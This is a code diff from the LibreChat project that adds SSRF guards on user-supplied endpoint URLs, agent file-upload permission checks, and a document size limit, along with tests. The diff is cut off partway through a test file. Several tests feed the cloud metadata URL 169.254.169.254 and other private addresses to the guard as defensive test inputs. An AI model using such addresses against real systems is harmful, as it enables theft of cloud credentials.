+ } + + if (protocol !== 'http:' && protocol !== 'https:') { + throwInvalidBaseURL(`Invalid base URL for ${endpoint}: only HTTP and HTTPS are permitted.`); + } + + if (isSSRFTarget(hostname)) { + throwInvalidBaseURL(`Base URL for ${endpoint} targets a restricted address.`); + } + + if (await resolveHostnameSSRF(hostname)) { + throwInvalidBaseURL(`Base URL for ${endpoint} resolves to a restricted address.`); + } +} diff --git a/packages/api/src/cluster/__tests__/LeaderElection.cache_integration.spec.ts b/packages/api/src/cluster/__tests__/LeaderElection.cache_integration.spec.ts index 9bad4dcfac..f1558db795 100644 --- a/packages/api/src/cluster/__tests__/LeaderElection.cache_integration.spec.ts +++ b/packages/api/src/cluster/__tests__/LeaderElection.cache_integration.spec.ts @@ -32,14 +32,22 @@ describe('LeaderElection with Redis', () => { process.setMaxListeners(200); }); - afterEach(async () => { - await Promise.all(instances.map((instance) => instance.resign())); - instances = []; - - // Clean up: clear the leader key directly from Redis + beforeEach(async () => { if (keyvRedisClient) { await keyvRedisClient.del(LeaderElection.LEADER_KEY); } + new LeaderElection().clearRefreshTimer(); + }); + + afterEach(async () => { + try { + await Promise.all(instances.map((instance) => instance.resign())); + } finally { + instances = []; + if (keyvRedisClient) { + await keyvRedisClient.del(LeaderElection.LEADER_KEY); + } + } }); afterAll(async () => { diff --git a/packages/api/src/endpoints/custom/initialize.spec.ts b/packages/api/src/endpoints/custom/initialize.spec.ts new file mode 100644 index 0000000000..911e17c446 --- /dev/null +++ b/packages/api/src/endpoints/custom/initialize.spec.ts @@ -0,0 +1,119 @@ +import { AuthType } from 'librechat-data-provider'; +import type { BaseInitializeParams } from '~/types'; + +const mockValidateEndpointURL = jest.fn(); +jest.mock('~/auth', () => ({ + validateEndpointURL: (...args: unknown[]) => mockValidateEndpointURL(...args), +})); + +const mockGetOpenAIConfig = jest.fn().mockReturnValue({ + llmConfig: { model: 'test-model' }, + configOptions: {}, +}); +jest.mock('~/endpoints/openai/config', () => ({ + getOpenAIConfig: (...args: unknown[]) => mockGetOpenAIConfig(...args), +})); + +jest.mock('~/endpoints/models', () => ({ + fetchModels: jest.fn(), +})); + +jest.mock('~/cache', () => ({ + standardCache: jest.fn(() => ({ get: jest.fn().mockResolvedValue(null) })), +})); + +jest.mock('~/utils', () => ({ + isUserProvided: (val: string) => val === 'user_provided', + checkUserKeyExpiry: jest.fn(), +})); + +const mockGetCustomEndpointConfig = jest.fn(); +jest.mock('~/app/config', () => ({ + getCustomEndpointConfig: (...args: unknown[]) => mockGetCustomEndpointConfig(...args), +})); + +import { initializeCustom } from './initialize'; + +function createParams(overrides: { + apiKey?: string; + baseURL?: string; + userBaseURL?: string; + userApiKey?: string; + expiresAt?: string; +}): BaseInitializeParams { + const { apiKey = 'sk-test-key', baseURL = 'https://api.example.com/v1' } = overrides; + + mockGetCustomEndpointConfig.mockReturnValue({ + apiKey, + baseURL, + models: {}, + }); + + const db = { + getUserKeyValues: jest.fn().mockResolvedValue({ + apiKey: overrides.userApiKey ?? 'sk-user-key', + baseURL: overrides.userBaseURL ?? 'https://user-api.example.com/v1', + }), + } as unknown as BaseInitializeParams['db']; + + return { + req: { + user: { id: 'user-1' }, + body: { key: overrides.expiresAt ?? '2099-01-01' }, + config: {}, + } as unknown as BaseInitializeParams['req'], + endpoint: 'test-custom', + model_parameters: { model: 'gpt-4' }, + db, + }; +} + +describe('initializeCustom – SSRF guard wiring', () => { + beforeEach(() => { + jest.clearAllMocks(); + }); + + it('should call validateEndpointURL when baseURL is user_provided', async () => { + const params = createParams({ + apiKey: 'sk-test-key', + baseURL: AuthType.USER_PROVIDED, + userBaseURL: 'https://user-api.example.com/v1', + expiresAt: '2099-01-01', + }); + + await initializeCustom(params); + + expect(mockValidateEndpointURL).toHaveBeenCalledTimes(1); + expect(mockValidateEndpointURL).toHaveBeenCalledWith( + 'https://user-api.example.com/v1', + 'test-custom', + ); + }); + + it('should NOT call validateEndpointURL when baseURL is system-defined', async () => { + const params = createParams({ + apiKey: 'sk-test-key', + baseURL: 'https://api.provider.com/v1', + }); + + await initializeCustom(params); + + expect(mockValidateEndpointURL).not.toHaveBeenCalled(); + }); + + it('should propagate SSRF rejection from validateEndpointURL', async () => { + mockValidateEndpointURL.mockRejectedValueOnce( + new Error('Base URL for test-custom targets a restricted address.'), + ); + + const params = createParams({ + apiKey: 'sk-test-key', + baseURL: AuthType.USER_PROVIDED, + userBaseURL: 'http://169.254.169.254/latest/meta-data/', + expiresAt: '2099-01-01', + }); + + await expect(initializeCustom(params)).rejects.toThrow('targets a restricted address'); + expect(mockGetOpenAIConfig).not.toHaveBeenCalled(); + }); +}); diff --git a/packages/api/src/endpoints/custom/initialize.ts b/packages/api/src/endpoints/custom/initialize.ts index 7930b1c12f..15b6b873c7 100644 --- a/packages/api/src/endpoints/custom/initialize.ts +++ b/packages/api/src/endpoints/custom/initialize.ts @@ -9,9 +9,10 @@ import type { TEndpoint } from 'librechat-data-provider'; import type { AppConfig } from '@librechat/data-schemas'; import type { BaseInitializeParams, InitializeResultBase, EndpointTokenConfig } from '~/types'; import { getOpenAIConfig } from '~/endpoints/openai/config'; +import { isUserProvided, checkUserKeyExpiry } from '~/utils'; import { getCustomEndpointConfig } from '~/app/config'; import { fetchModels } from '~/endpoints/models'; -import { isUserProvided, checkUserKeyExpiry } from '~/utils'; +import { validateEndpointURL } from '~/auth'; import { standardCache } from '~/cache'; const { PROXY } = process.env; @@ -123,6 +124,10 @@ export async function initializeCustom({ throw new Error(`${endpoint} Base URL not provided.`); } + if (userProvidesURL) { + await validateEndpointURL(baseURL, endpoint); + } + let endpointTokenConfig: EndpointTokenConfig | undefined; const userId = req.user?.id ?? ''; diff --git a/packages/api/src/endpoints/openai/initialize.spec.ts b/packages/api/src/endpoints/openai/initialize.spec.ts new file mode 100644 index 0000000000..ae91571fb3 --- /dev/null +++ b/packages/api/src/endpoints/openai/initialize.spec.ts @@ -0,0 +1,135 @@ +import { AuthType, EModelEndpoint } from 'librechat-data-provider'; +import type { BaseInitializeParams } from '~/types'; + +const mockValidateEndpointURL = jest.fn(); +jest.mock('~/auth', () => ({ + validateEndpointURL: (...args: unknown[]) => mockValidateEndpointURL(...args), +})); + +const mockGetOpenAIConfig = jest.fn().mockReturnValue({ + llmConfig: { model: 'gpt-4' }, + configOptions: {}, +}); +jest.mock('./config', () => ({ + getOpenAIConfig: (...args: unknown[]) => mockGetOpenAIConfig(...args), +})); + +jest.mock('~/utils', () => ({ + getAzureCredentials: jest.fn(), + resolveHeaders: jest.fn(() => ({})), + isUserProvided: (val: string) => val === 'user_provided', + checkUserKeyExpiry: jest.fn(), +})); + +import { initializeOpenAI } from './initialize'; + +function createParams(env: Record): BaseInitializeParams { + const savedEnv: Record = {}; + for (const key of Object.keys(env)) { + savedEnv[key] = process.env[key]; + } + Object.assign(process.env, env); + + const db = { + getUserKeyValues: jest.fn().mockResolvedValue({ + apiKey: 'sk-user-key', + baseURL: 'https://user-proxy.example.com/v1', + }), + } as unknown as BaseInitializeParams['db']; + + const params: BaseInitializeParams = { + req: { + user: { id: 'user-1' }, + body: { key: '2099-01-01' }, + config: { endpoints: {} }, + } as unknown as BaseInitializeParams['req'], + endpoint: EModelEndpoint.openAI, + model_parameters: { model: 'gpt-4' }, + db, + }; + + const restore = () => { + for (const key of Object.keys(env)) { + if (savedEnv[key] === undefined) { + delete process.env[key]; + } else { + process.env[key] = savedEnv[key]; + } + } + }; + + return Object.assign(params, { _restore: restore }); +} + +describe('initializeOpenAI – SSRF guard wiring', () => { + afterEach(() => { + jest.clearAllMocks(); + }); + + it('should call validateEndpointURL when OPENAI_REVERSE_PROXY is user_provided', async () => { + const params = createParams({ + OPENAI_API_KEY: 'sk-test', + OPENAI_REVERSE_PROXY: AuthType.USER_PROVIDED, + }); + + try { + await initializeOpenAI(params); + } finally { + (params as unknown as { _restore: () => void })._restore(); + } + + expect(mockValidateEndpointURL).toHaveBeenCalledTimes(1); + expect(mockValidateEndpointURL).toHaveBeenCalledWith( + 'https://user-proxy.example.com/v1', + EModelEndpoint.openAI, + ); + }); + + it('should NOT call validateEndpointURL when OPENAI_REVERSE_PROXY is a system URL', async () => { + const params = createParams({ + OPENAI_API_KEY: 'sk-test', + OPENAI_REVERSE_PROXY: 'https://api.openai.com/v1', + }); + + try { + await initializeOpenAI(params); + } finally { + (params as unknown as { _restore: () => void })._restore(); + } + + expect(mockValidateEndpointURL).not.toHaveBeenCalled(); + }); + + it('should NOT call validateEndpointURL when baseURL is falsy', async () => { + const params = createParams({ + OPENAI_API_KEY: 'sk-test', + }); + + try { + await initializeOpenAI(params); + } finally { + (params as unknown as { _restore: () => void })._restore(); + } + + expect(mockValidateEndpointURL).not.toHaveBeenCalled(); + }); + + it('should propagate SSRF rejection from validateEndpointURL', async () => { + mockValidateEndpointURL.mockRejectedValueOnce( + new Error('Base URL for openAI targets a restricted address.'), + ); + + const params = createParams({ + OPENAI_API_KEY: 'sk-test', + OPENAI_REVERSE_PROXY: AuthType.USER_PROVIDED, + }); + + try { + await expect(initializeOpenAI(params)).rejects.toThrow('targets a restricted address'); + } finally { + (params as unknown as { _restore: () => void })._restore(); + } + + expect(mockGetOpenAIConfig).not.toHaveBeenCalled(); + }); +}); diff --git a/packages/api/src/endpoints/openai/initialize.ts b/packages/api/src/endpoints/openai/initialize.ts index 33ce233d34..a6ad6df895 100644 --- a/packages/api/src/endpoints/openai/initialize.ts +++ b/packages/api/src/endpoints/openai/initialize.ts @@ -6,6 +6,7 @@ import type { UserKeyValues, } from '~/types'; import { getAzureCredentials, resolveHeaders, isUserProvided, checkUserKeyExpiry } from '~/utils'; +import { validateEndpointURL } from '~/auth'; import { getOpenAIConfig } from './config'; /** @@ -55,6 +56,10 @@ export async function initializeOpenAI({ ? userValues?.baseURL : baseURLOptions[endpoint as keyof typeof baseURLOptions]; + if (userProvidesURL && baseURL) { + await validateEndpointURL(baseURL, endpoint); + } + const clientOptions: OpenAIConfigOptions = { proxy: PROXY ?? undefined, reverseProxyUrl: baseURL || undefined, diff --git a/packages/api/src/files/agents/auth.ts b/packages/api/src/files/agents/auth.ts new file mode 100644 index 0000000000..d9fb2b7423 --- /dev/null +++ b/packages/api/src/files/agents/auth.ts @@ -0,0 +1,113 @@ +import type { IUser } from '@librechat/data-schemas'; +import type { Response } from 'express'; +import type { Types } from 'mongoose'; +import { logger } from '@librechat/data-schemas'; +import { SystemRoles, ResourceType, PermissionBits } from 'librechat-data-provider'; +import type { ServerRequest } from '~/types'; + +export type AgentUploadAuthResult = + | { allowed: true } + | { allowed: false; status: number; error: string; message: string }; + +export interface AgentUploadAuthParams { + userId: string; + userRole: string; + agentId?: string; + toolResource?: string | null; + messageFile?: boolean | string; +} + +export interface AgentUploadAuthDeps { + getAgent: (params: { id: string }) => Promise<{ + _id: string | Types.ObjectId; + author?: string | Types.ObjectId | null; + } | null>; + checkPermission: (params: { + userId: string; + role: string; + resourceType: ResourceType; + resourceId: string | Types.ObjectId; + requiredPermission: number; + }) => Promise; +} + +export async function checkAgentUploadAuth( + params: AgentUploadAuthParams, + deps: AgentUploadAuthDeps, +): Promise { + const { userId, userRole, agentId, toolResource, messageFile } = params; + const { getAgent, checkPermission } = deps; + + const isMessageAttachment = messageFile === true || messageFile === 'true'; + if (!agentId || toolResource == null || isMessageAttachment) { + return { allowed: true }; + } + + if (userRole === SystemRoles.ADMIN) { + return { allowed: true }; + } + + const agent = await getAgent({ id: agentId }); + if (!agent) { + return { allowed: false, status: 404, error: 'Not Found', message: 'Agent not found' }; + } + + if (agent.author?.toString() === userId) { + return { allowed: true }; + } + + const hasEditPermission = await checkPermission({ + userId, + role: userRole, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + requiredPermission: PermissionBits.EDIT, + }); + + if (hasEditPermission) { + return { allowed: true }; + } + + logger.warn( + `[agentUploadAuth] User ${userId} denied upload to agent ${agentId} (insufficient permissions)`, + ); + return { + allowed: false, + status: 403, + error: 'Forbidden', + message: 'Insufficient permissions to upload files to this agent', + }; +} + +/** @returns true if denied (response already sent), false if allowed */ +export async function verifyAgentUploadPermission({ + req, + res, + metadata, + getAgent, + checkPermission, +}: { + req: ServerRequest; + res: Response; + metadata: { agent_id?: string; tool_resource?: string | null; message_file?: boolean | string }; + getAgent: AgentUploadAuthDeps['getAgent']; + checkPermission: AgentUploadAuthDeps['checkPermission']; +}): Promise { + const user = req.user as IUser; + const result = await checkAgentUploadAuth( + { + userId: user.id, + userRole: user.role ?? '', + agentId: metadata.agent_id, + toolResource: metadata.tool_resource, + messageFile: metadata.message_file, + }, + { getAgent, checkPermission }, + ); + + if (!result.allowed) { + res.status(result.status).json({ error: result.error, message: result.message }); + return true; + } + return false; +} diff --git a/packages/api/src/files/agents/index.ts b/packages/api/src/files/agents/index.ts new file mode 100644 index 0000000000..269586ee8b --- /dev/null +++ b/packages/api/src/files/agents/index.ts @@ -0,0 +1 @@ +export * from './auth'; diff --git a/packages/api/src/files/documents/crud.spec.ts b/packages/api/src/files/documents/crud.spec.ts index f22693718a..f8b255dd5e 100644 --- a/packages/api/src/files/documents/crud.spec.ts +++ b/packages/api/src/files/documents/crud.spec.ts @@ -122,6 +122,30 @@ describe('Document Parser', () => { await expect(parseDocument({ file })).rejects.toThrow('No text found in document'); }); + test('parseDocument() rejects files exceeding the pre-parse size limit', async () => { + const file = { + originalname: 'oversized.docx', + path: path.join(__dirname, 'sample.docx'), + mimetype: 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', + size: 16 * 1024 * 1024, + } as Express.Multer.File; + + await expect(parseDocument({ file })).rejects.toThrow( + /exceeds the 15MB document parser limit \(16MB\)/, + ); + }); + + test('parseDocument() allows files exactly at the size limit boundary', async () => { + const file = { + originalname: 'sample.docx', + path: path.join(__dirname, 'sample.docx'), + mimetype: 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', + size: 15 * 1024 * 1024, + } as Express.Multer.File; + + await expect(parseDocument({ file })).resolves.toBeDefined(); + }); + test('parseDocument() parses empty xlsx with only sheet name', async () => { const file = { originalname: 'empty.xlsx', diff --git a/packages/api/src/files/documents/crud.ts b/packages/api/src/files/documents/crud.ts index ab16534b45..61c1956542 100644 --- a/packages/api/src/files/documents/crud.ts +++ b/packages/api/src/files/documents/crud.ts @@ -1,35 +1,39 @@ import * as fs from 'fs'; -import { excelMimeTypes, FileSources } from 'librechat-data-provider'; +import { megabyte, excelMimeTypes, FileSources } from 'librechat-data-provider'; import type { TextItem } from 'pdfjs-dist/types/src/display/api'; import type { MistralOCRUploadResult } from '~/types'; +type FileParseFn = (file: Express.Multer.File) => Promise; + +const DOCUMENT_PARSER_MAX_FILE_SIZE = 15 * megabyte; + /** * Parses an uploaded document and extracts its text content and metadata. * Handled types must stay in sync with `documentParserMimeTypes` from data-provider. * - * @throws {Error} if `file.mimetype` is not handled or no text is found. + * @throws {Error} if `file.mimetype` is not handled, file exceeds size limit, or no text is found. */ export async function parseDocument({ file, }: { file: Express.Multer.File; }): Promise { - let text: string; - if (file.mimetype === 'application/pdf') { - text = await pdfToText(file); - } else if ( - file.mimetype === 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' - ) { - text = await wordDocToText(file); - } else if ( - excelMimeTypes.test(file.mimetype) || - file.mimetype === 'application/vnd.oasis.opendocument.spreadsheet' - ) { - text = await excelSheetToText(file); - } else { + const parseFn = getParserForMimeType(file.mimetype); + if (!parseFn) { throw new Error(`Unsupported file type in document parser: ${file.mimetype}`); } + const fileSize = file.size ?? (file.path != null ? (await fs.promises.stat(file.path)).size : 0); + if (fileSize > DOCUMENT_PARSER_MAX_FILE_SIZE) { + const limitMB = DOCUMENT_PARSER_MAX_FILE_SIZE / megabyte; + const sizeMB = Math.ceil(fileSize / megabyte); + throw new Error( + `File "${file.originalname}" exceeds the ${limitMB}MB document parser limit (${sizeMB}MB).`, + ); + } + + const text = await parseFn(file); + if (!text?.trim()) { throw new Error('No text found in document'); } @@ -43,6 +47,23 @@ export async function parseDocument({ }; } +/** Maps a MIME type to its document parser function, or `undefined` if unsupported. */ +function getParserForMimeType(mimetype: string): FileParseFn | undefined { + if (mimetype === 'application/pdf') { + return pdfToText; + } + if (mimetype === 'application/vnd.openxmlformats-officedocument.wordprocessingml.document') { + return wordDocToText; + } + if ( + excelMimeTypes.test(mimetype) || + mimetype === 'application/vnd.oasis.opendocument.spreadsheet' + ) { + return excelSheetToText; + } + return undefined; +} + /** Parses PDF, returns text inside. */ async function pdfToText(file: Express.Multer.File): Promise { // Imported inline so that Jest can test other routes without failing due to loading ESM diff --git a/packages/api/src/files/index.ts b/packages/api/src/files/index.ts index 707f2ef7fb..c3bdb49478 100644 --- a/packages/api/src/files/index.ts +++ b/packages/api/src/files/index.ts @@ -1,3 +1,4 @@ +export * from './agents'; export * from './audio'; export * from './context'; export * from './documents/crud'; diff --git a/packages/api/src/mcp/ConnectionsRepository.ts b/packages/api/src/mcp/ConnectionsRepository.ts index e629934dda..6313faa8d4 100644 --- a/packages/api/src/mcp/ConnectionsRepository.ts +++ b/packages/api/src/mcp/ConnectionsRepository.ts @@ -1,8 +1,9 @@ import { logger } from '@librechat/data-schemas'; -import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory'; -import { MCPConnection } from './connection'; -import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry'; import type * as t from './types'; +import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry'; +import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory'; +import { hasCustomUserVars } from './utils'; +import { MCPConnection } from './connection'; const CONNECT_CONCURRENCY = 3; @@ -76,12 +77,14 @@ export class ConnectionsRepository { await this.disconnect(serverName); } } + const registry = MCPServersRegistry.getInstance(); const connection = await MCPConnectionFactory.create( { serverName, serverConfig, dbSourced: !!(serverConfig as t.ParsedServerConfig).dbId, - useSSRFProtection: MCPServersRegistry.getInstance().shouldEnableSSRFProtection(), + useSSRFProtection: registry.shouldEnableSSRFProtection(), + allowedDomains: registry.getAllowedDomains(), }, this.oauthOpts, ); @@ -139,12 +142,19 @@ export class ConnectionsRepository { return `[MCP][${serverName}]`; } + /** + * App-level (shared) connections cannot serve servers that need per-user context: + * env/header placeholders like `{{MY_KEY}}` are only resolved by `processMCPEnv()` + * when real `customUserVars` values exist — which requires a user-level connection. + */ private isAllowedToConnectToServer(config: t.ParsedServerConfig) { if (config.inspectionFailed) { return false; } - //the repository is not allowed to be connected in case the Connection repository is shared (ownerId is undefined/null) and the server requires Auth or startup false. - if (this.ownerId === undefined && (config.startup === false || config.requiresOAuth)) { + if ( + this.ownerId === undefined && + (config.startup === false || config.requiresOAuth || hasCustomUserVars(config)) + ) { return false; } return true; diff --git a/packages/api/src/mcp/MCPConnectionFactory.ts b/packages/api/src/mcp/MCPConnectionFactory.ts index 0fc86e0315..2c16da0760 100644 --- a/packages/api/src/mcp/MCPConnectionFactory.ts +++ b/packages/api/src/mcp/MCPConnectionFactory.ts @@ -30,6 +30,7 @@ export class MCPConnectionFactory { protected readonly logPrefix: string; protected readonly useOAuth: boolean; protected readonly useSSRFProtection: boolean; + protected readonly allowedDomains?: string[] | null; // OAuth-related properties (only set when useOAuth is true) protected readonly userId?: string; @@ -197,6 +198,7 @@ export class MCPConnectionFactory { this.serverName = basic.serverName; this.useOAuth = !!oauth?.useOAuth; this.useSSRFProtection = basic.useSSRFProtection === true; + this.allowedDomains = basic.allowedDomains; this.connectionTimeout = oauth?.connectionTimeout; this.logPrefix = oauth?.user ? `[MCP][${basic.serverName}][${oauth.user.id}]` @@ -285,6 +287,8 @@ export class MCPConnectionFactory { serverName: string; identifier: string; clientInfo?: OAuthClientInformation; + storedTokenEndpoint?: string; + storedAuthMethods?: string[]; }, ) => Promise { return async (refreshToken, metadata) => { @@ -294,9 +298,12 @@ export class MCPConnectionFactory { serverUrl: (this.serverConfig as t.SSEOptions | t.StreamableHTTPOptions).url, serverName: metadata.serverName, clientInfo: metadata.clientInfo, + storedTokenEndpoint: metadata.storedTokenEndpoint, + storedAuthMethods: metadata.storedAuthMethods, }, this.serverConfig.oauth_headers ?? {}, this.serverConfig.oauth, + this.allowedDomains, ); }; } @@ -340,6 +347,7 @@ export class MCPConnectionFactory { this.userId!, config?.oauth_headers ?? {}, config?.oauth, + this.allowedDomains, ); if (existingFlow) { @@ -603,6 +611,7 @@ export class MCPConnectionFactory { this.userId!, this.serverConfig.oauth_headers ?? {}, this.serverConfig.oauth, + this.allowedDomains, ); // Store flow state BEFORE redirecting so the callback can find it diff --git a/packages/api/src/mcp/MCPManager.ts b/packages/api/src/mcp/MCPManager.ts index 6fdf45c27a..afb6c68796 100644 --- a/packages/api/src/mcp/MCPManager.ts +++ b/packages/api/src/mcp/MCPManager.ts @@ -100,13 +100,16 @@ export class MCPManager extends UserConnectionManager { const useOAuth = Boolean(serverConfig.requiresOAuth || serverConfig.oauthMetadata); - const useSSRFProtection = MCPServersRegistry.getInstance().shouldEnableSSRFProtection(); + const registry = MCPServersRegistry.getInstance(); + const useSSRFProtection = registry.shouldEnableSSRFProtection(); + const allowedDomains = registry.getAllowedDomains(); const dbSourced = !!serverConfig.dbId; const basic: t.BasicConnectionOptions = { dbSourced, serverName, serverConfig, useSSRFProtection, + allowedDomains, }; if (!useOAuth) { diff --git a/packages/api/src/mcp/UserConnectionManager.ts b/packages/api/src/mcp/UserConnectionManager.ts index 76523fc0fc..2e9d5be467 100644 --- a/packages/api/src/mcp/UserConnectionManager.ts +++ b/packages/api/src/mcp/UserConnectionManager.ts @@ -153,12 +153,14 @@ export abstract class UserConnectionManager { logger.info(`[MCP][User: ${userId}][${serverName}] Establishing new connection`); try { + const registry = MCPServersRegistry.getInstance(); connection = await MCPConnectionFactory.create( { serverConfig: config, serverName: serverName, dbSourced: !!config.dbId, - useSSRFProtection: MCPServersRegistry.getInstance().shouldEnableSSRFProtection(), + useSSRFProtection: registry.shouldEnableSSRFProtection(), + allowedDomains: registry.getAllowedDomains(), }, { useOAuth: true, diff --git a/packages/api/src/mcp/__tests__/ConnectionsRepository.test.ts b/packages/api/src/mcp/__tests__/ConnectionsRepository.test.ts index 3b827774d0..7a93960765 100644 --- a/packages/api/src/mcp/__tests__/ConnectionsRepository.test.ts +++ b/packages/api/src/mcp/__tests__/ConnectionsRepository.test.ts @@ -25,6 +25,7 @@ const mockRegistryInstance = { getServerConfig: jest.fn(), getAllServerConfigs: jest.fn(), shouldEnableSSRFProtection: jest.fn().mockReturnValue(false), + getAllowedDomains: jest.fn().mockReturnValue(null), }; jest.mock('../registry/MCPServersRegistry', () => ({ @@ -110,6 +111,7 @@ describe('ConnectionsRepository', () => { serverName: 'server1', serverConfig: mockServerConfigs.server1, useSSRFProtection: false, + allowedDomains: null, dbSourced: false, }, undefined, @@ -133,6 +135,7 @@ describe('ConnectionsRepository', () => { serverName: 'server1', serverConfig: mockServerConfigs.server1, useSSRFProtection: false, + allowedDomains: null, dbSourced: false, }, undefined, @@ -173,6 +176,7 @@ describe('ConnectionsRepository', () => { serverName: 'server1', serverConfig: configWithCachedAt, useSSRFProtection: false, + allowedDomains: null, dbSourced: false, }, undefined, @@ -392,6 +396,36 @@ describe('ConnectionsRepository', () => { expect(await repository.has('oauthDisabledServer')).toBe(false); }); + it('should NOT allow connection to servers with customUserVars', async () => { + mockServerConfigs.customVarServer = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + }; + + expect(await repository.has('customVarServer')).toBe(false); + }); + + it('should NOT allow connection when customUserVars is defined, even when startup is explicitly true', async () => { + mockServerConfigs.customVarStartupServer = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { TOKEN: '{{USER_TOKEN}}' }, + startup: true, + requiresOAuth: false, + customUserVars: { + USER_TOKEN: { title: 'Token', description: 'Your token' }, + }, + }; + + expect(await repository.has('customVarStartupServer')).toBe(false); + }); + it('should disconnect existing connection when server becomes not allowed', async () => { // Initially setup as regular server mockServerConfigs.changingServer = { @@ -471,6 +505,20 @@ describe('ConnectionsRepository', () => { expect(await repository.has('oauthDisabledServer')).toBe(true); }); + it('should allow connection to servers with customUserVars', async () => { + mockServerConfigs.customVarServer = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + }; + + expect(await repository.has('customVarServer')).toBe(true); + }); + it('should return null from get() when server config does not exist', async () => { const connection = await repository.get('nonexistent'); expect(connection).toBeNull(); diff --git a/packages/api/src/mcp/__tests__/MCPConnectionFactory.test.ts b/packages/api/src/mcp/__tests__/MCPConnectionFactory.test.ts index bceb23b246..23bfa89d56 100644 --- a/packages/api/src/mcp/__tests__/MCPConnectionFactory.test.ts +++ b/packages/api/src/mcp/__tests__/MCPConnectionFactory.test.ts @@ -269,6 +269,7 @@ describe('MCPConnectionFactory', () => { 'user123', {}, undefined, + undefined, ); // initFlow must be awaited BEFORE the redirect to guarantee state is stored diff --git a/packages/api/src/mcp/__tests__/MCPManager.test.ts b/packages/api/src/mcp/__tests__/MCPManager.test.ts index bf63a6af3c..dd1ead0dd9 100644 --- a/packages/api/src/mcp/__tests__/MCPManager.test.ts +++ b/packages/api/src/mcp/__tests__/MCPManager.test.ts @@ -34,6 +34,7 @@ const mockRegistryInstance = { getAllServerConfigs: jest.fn(), getOAuthServers: jest.fn(), shouldEnableSSRFProtection: jest.fn().mockReturnValue(false), + getAllowedDomains: jest.fn().mockReturnValue(null), }; jest.mock('~/mcp/registry/MCPServersRegistry', () => ({ diff --git a/packages/api/src/mcp/__tests__/MCPOAuthFlow.test.ts b/packages/api/src/mcp/__tests__/MCPOAuthFlow.test.ts index 8437177c86..f73a5ed3e8 100644 --- a/packages/api/src/mcp/__tests__/MCPOAuthFlow.test.ts +++ b/packages/api/src/mcp/__tests__/MCPOAuthFlow.test.ts @@ -24,6 +24,13 @@ jest.mock('@librechat/data-schemas', () => ({ decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')), })); +/** Bypass SSRF validation — these tests use real local HTTP servers. */ +jest.mock('~/auth', () => ({ + ...jest.requireActual('~/auth'), + isSSRFTarget: jest.fn(() => false), + resolveHostnameSSRF: jest.fn(async () => false), +})); + describe('MCP OAuth Flow — Real HTTP Server', () => { afterEach(() => { jest.clearAllMocks(); diff --git a/packages/api/src/mcp/__tests__/MCPOAuthRaceCondition.test.ts b/packages/api/src/mcp/__tests__/MCPOAuthRaceCondition.test.ts index 85febb3ece..cb6187ab45 100644 --- a/packages/api/src/mcp/__tests__/MCPOAuthRaceCondition.test.ts +++ b/packages/api/src/mcp/__tests__/MCPOAuthRaceCondition.test.ts @@ -82,6 +82,7 @@ describe('MCP OAuth Race Condition Fixes', () => { .mockReturnValue({ getServerConfig: jest.fn().mockResolvedValue(mockConfig), shouldEnableSSRFProtection: jest.fn().mockReturnValue(false), + getAllowedDomains: jest.fn().mockReturnValue(null), }); const { MCPConnectionFactory } = await import('~/mcp/MCPConnectionFactory'); @@ -147,6 +148,7 @@ describe('MCP OAuth Race Condition Fixes', () => { .mockReturnValue({ getServerConfig: jest.fn().mockResolvedValue(mockConfig), shouldEnableSSRFProtection: jest.fn().mockReturnValue(false), + getAllowedDomains: jest.fn().mockReturnValue(null), }); const { MCPConnectionFactory } = await import('~/mcp/MCPConnectionFactory'); diff --git a/packages/api/src/mcp/__tests__/MCPOAuthSecurity.test.ts b/packages/api/src/mcp/__tests__/MCPOAuthSecurity.test.ts new file mode 100644 index 0000000000..a2d0440d42 --- /dev/null +++ b/packages/api/src/mcp/__tests__/MCPOAuthSecurity.test.ts @@ -0,0 +1,442 @@ +/** + * Tests verifying MCP OAuth security hardening: + * + * 1. SSRF via OAuth URLs — validates that the OAuth handler rejects + * token_url, authorization_url, and revocation_endpoint values + * pointing to private/internal addresses. + * + * 2. redirect_uri manipulation — validates that user-supplied redirect_uri + * is ignored in favor of the server-controlled default. + * + * 3. allowedDomains SSRF exemption — validates that admin-configured allowedDomains + * exempts trusted domains from SSRF checks, including auto-discovery paths. + */ + +import * as http from 'http'; +import * as net from 'net'; +import { TokenExchangeMethodEnum } from 'librechat-data-provider'; +import type { Socket } from 'net'; +import type { OAuthTestServer } from './helpers/oauthTestServer'; +import { createOAuthMCPServer } from './helpers/oauthTestServer'; +import { MCPOAuthHandler } from '~/mcp/oauth'; + +jest.mock('@librechat/data-schemas', () => ({ + logger: { + info: jest.fn(), + warn: jest.fn(), + error: jest.fn(), + debug: jest.fn(), + }, + encryptV2: jest.fn(async (val: string) => `enc:${val}`), + decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')), +})); + +/** + * Mock only the DNS-dependent resolveHostnameSSRF; keep isSSRFTarget real. + * SSRF tests use literal private IPs (127.0.0.1, 169.254.169.254, 10.0.0.1) + * which are caught by isSSRFTarget before resolveHostnameSSRF is reached. + * This avoids non-deterministic DNS lookups in test execution. + */ +jest.mock('~/auth', () => ({ + ...jest.requireActual('~/auth'), + resolveHostnameSSRF: jest.fn(async () => false), +})); + +function getFreePort(): Promise { + return new Promise((resolve, reject) => { + const srv = net.createServer(); + srv.listen(0, '127.0.0.1', () => { + const addr = srv.address() as net.AddressInfo; + srv.close((err) => (err ? reject(err) : resolve(addr.port))); + }); + }); +} + +function trackSockets(httpServer: http.Server): () => Promise { + const sockets = new Set(); + httpServer.on('connection', (socket: Socket) => { + sockets.add(socket); + socket.once('close', () => sockets.delete(socket)); + }); + return () => + new Promise((resolve) => { + for (const socket of sockets) { + 